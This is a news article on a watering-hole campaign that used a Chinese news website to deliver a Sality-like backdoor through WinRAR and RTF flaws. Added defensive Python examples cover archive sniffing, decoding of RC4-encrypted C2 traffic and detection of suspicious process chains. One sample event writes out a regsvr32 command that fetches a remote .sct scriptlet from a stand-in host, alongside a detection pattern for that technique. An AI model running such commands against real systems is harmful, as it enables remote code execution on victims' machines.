A new malware campaign has counted a Chinese news website among its victims and has used the legitimate domain to spread backdoors to the PCs of innocent readers.
FortiGuard Labs said on Wednesday that the campaign, targeted at Chinese language speakers, is using a watering hole strategy as its infection vector.
Watering hole attacks occur after an attacker has probed a website and tested its defenses to find weaknesses. The target domain is then infected -- potentially through a vulnerability or through phishing an operator -- and malicious scripts are loaded onto the website in order to spring a malware trap.
Browsers connecting to the website will also be checked for vulnerabilities, or malware packages may be directly downloaded, awaiting execution by the unwitting visitor. Other attacks, such as malvertising or card skimming, are also possible.
The campaign has been active since at least 2017. One of its latest victims, the Chinese news website, is hosted in the United States and provides content for Chinese citizens living overseas.
FortiGuard Labs says the infection "appears to be experimental because it uses so many different techniques and tools to target this end-user community."
Phishing links have been injected into the domain, including a fake Twitter login page and malicious scripts which check the browser and OS information of visitors to make sure they are using a Microsoft Windows system.
The attackers make use of known WinRAR and RTF file vulnerabilities. The security flaws, tracked as CVE-2018-20250 and CVE-2017-11882, are exploited to deliver a backdoor. If a system is vulnerable, the WinRAR flaw is used to hide an .ace file as .rar, and another file -- conf.exe -- is then extracted and assigned to startup.
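The WinRAR technique described above relies on shipping an ACE archive under a .rar name, so a cheap defensive check is to compare the extension against the file's magic bytes before it reaches the archiver. The following Python is an added example written for this article, not code from FortiGuard Labs or from the campaign; the sample headers it scans are constructed inline and the file names are placeholders.

```python
"""Added example: flag files whose name says .rar but whose bytes say ACE."""
import os
import tempfile

RAR4_MAGIC = b"Rar!\x1a\x07\x00"       # RAR 1.5 - 4.x signature
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"   # RAR 5.x signature
ACE_MAGIC = b"**ACE**"                 # ACE signature, stored at byte offset 7
ACE_MAGIC_OFFSET = 7


def sniff_archive(header: bytes) -> str:
    """Identify an archive from its first bytes: 'rar', 'ace' or 'unknown'."""
    if header.startswith(RAR5_MAGIC) or header.startswith(RAR4_MAGIC):
        return "rar"
    if header[ACE_MAGIC_OFFSET:ACE_MAGIC_OFFSET + len(ACE_MAGIC)] == ACE_MAGIC:
        return "ace"
    return "unknown"


def check_file(path: str) -> dict:
    """Compare the extension with the sniffed type; an ACE body under .rar is flagged."""
    with open(path, "rb") as fh:
        header = fh.read(32)
    ext = os.path.splitext(path)[1].lower().lstrip(".")
    detected = sniff_archive(header)
    return {
        "name": os.path.basename(path),
        "extension": ext,
        "detected": detected,
        "suspicious": ext == "rar" and detected == "ace",
    }


def scan_constructed_samples() -> list:
    """Write two constructed archive headers to a temp dir and check both."""
    # Constructed ACE main header: CRC16, header size, header type, flags, then "**ACE**".
    ace_header = b"\x00\x00" + b"\x00\x00" + b"\x00" + b"\x00\x00" + ACE_MAGIC + b"\x00" * 16
    rar_header = RAR5_MAGIC + b"\x00" * 24
    samples = {"setup.rar": rar_header, "invoice.rar": ace_header}  # placeholder names
    results = []
    with tempfile.TemporaryDirectory() as tmp:
        for name, blob in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "wb") as fh:
                fh.write(blob)
            results.append(check_file(path))
    return results


if __name__ == "__main__":
    for result in scan_constructed_samples():
        print(result)
```

Only the first 32 bytes are read, so the check is cheap enough to run on every attachment or download; a mismatch is worth quarantining regardless of whether the archiver in use is patched.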
Conf.exe contains Sality, a trojan that dynamically loads a malicious DLL and is able to harvest and send stolen system data to the attacker's command-and-control (C2) server. In addition, the malware is able to collect screenshots, create file lists, launch reverse shells, download files, and grab clipboard text and MD5 hashes, among other functions.
RC4 encryption and a hardcoded encryption key are used to encrypt and decrypt information sent to the C2 by the malware.
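A hardcoded RC4 key means the same keystream protects every session, so an analyst who pulls the key out of one sample can decode any captured C2 exchange. The block below is an added example illustrating that point, not the malware's code or FortiGuard's tooling; the key and the "captured" messages are constructed placeholders.

```python
"""Added example: RC4 with a static key, from the analyst's side of the capture."""


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling, then XOR the data with the PRGA keystream.

    RC4 is symmetric, so one function both encrypts and decrypts.
    """
    if not key:
        raise ValueError("RC4 key must not be empty")
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm (KSA)
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation (PRGA)
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Constructed placeholder for the key an analyst would recover from the sample.
HARDCODED_KEY = b"example-static-key"


def encrypt_beacon(plaintext: bytes) -> bytes:
    """Stand-in for what the implant does before sending data to the C2 (constructed)."""
    return rc4(HARDCODED_KEY, plaintext)


def decode_capture(ciphertext: bytes) -> bytes:
    """Defender side: decrypt a captured C2 message with the recovered key."""
    return rc4(HARDCODED_KEY, ciphertext)


if __name__ == "__main__":
    # Two separate "sessions" share one key, so one decoder handles both.
    captures = [encrypt_beacon(b"host=WS01;user=test"),
                encrypt_beacon(b"clipboard=hello")]
    for blob in captures:
        print(decode_capture(blob))
```

The same property that makes the traffic easy to decode in the lab also makes it easy to write a network signature for: with the key in hand, a sensor can decrypt and inspect beacons inline rather than matching on opaque bytes.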
However, it does seem the developers failed to finish off their exploit, given that conf.exe is only extracted when the username 'test' is in play.
The RTF flaw is used to deploy a fake .doc file -- which is actually a .rtf file -- which triggers the Microsoft Equation Editor, runs regsvr32.exe, and downloads an additional payload called 123.sct.
This malicious script then downloads a backdoor that contains the same functionality as Sality.
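The RTF chain above leaves a distinctive process lineage: the Equation Editor, which has no business launching anything, spawns regsvr32.exe, and regsvr32.exe is pointed at a scriptlet rather than a local DLL. The following Python is an added detection example written for this article, not code from FortiGuard Labs; it runs two rules over constructed process-creation events. Only the file name 123.sct comes from the article; the host, parent processes and command lines are constructed placeholders.

```python
"""Added example: flag the Equation Editor -> regsvr32 -> remote scriptlet chain."""
import re

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"parent": "WINWORD.EXE", "image": "EQNEDT32.EXE",
     "cmdline": "EQNEDT32.EXE -Embedding"},
    {"parent": "EQNEDT32.EXE", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /i:http://c2.example.invalid/123.sct"},
    {"parent": "msiexec.exe", "image": "regsvr32.exe",
     "cmdline": 'regsvr32.exe /s "C:\\Program Files\\Vendor\\plugin.dll"'},
]

# A /i: argument pointing at http(s) or a UNC path, or any .sct target.
REMOTE_SCRIPTLET = re.compile(r"(?i)/i:\s*[\"']?(?:https?://|\\\\)|\.sct\b")


def analyse(events: list) -> list:
    """Return (event_index, reason) pairs for events that match either rule."""
    alerts = []
    for idx, ev in enumerate(events):
        # Rule 1: the Equation Editor should never have a child process.
        if ev["parent"].upper() == "EQNEDT32.EXE":
            alerts.append((idx, "Equation Editor spawned a child process"))
        # Rule 2: regsvr32 given a remote or scriptlet target.
        if ev["image"].lower() == "regsvr32.exe" and REMOTE_SCRIPTLET.search(ev["cmdline"]):
            alerts.append((idx, "regsvr32 loading a remote or scriptlet (.sct) target"))
    return alerts


if __name__ == "__main__":
    for idx, reason in analyse(SAMPLE_EVENTS):
        print(f"event {idx}: {reason} -> {SAMPLE_EVENTS[idx]['cmdline']}")
```

Rule 1 fires on the parent alone, so it still catches the chain if a future sample swaps regsvr32.exe for another host binary; rule 2 catches scriptlet loading regardless of parent, so a legitimate installer registering a local DLL (event 2) stays quiet.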
"We found this backdoor malware always uses a Chinese-native software name to lure a victim to execute it," the researchers say. "The latest sample is uploaded with the name "XLAccount.dll" [...] a known module belonging to Xunlei Game Box, a web game platform developed by Xunlei. It [also] has an interesting new functionality to collect information of a VPN tool, called "Shadowsocks," which is used in China for going over the Great Firewall of China."
FortiGuard Labs says that at the time of public disclosure, the malicious script was still operating on the Chinese news website.
"While we analyzed [the malware's] functionalities and C2 connections in this blog, it is still under active development and adding new functionalities to improve its ability to steal more information and data," the team added.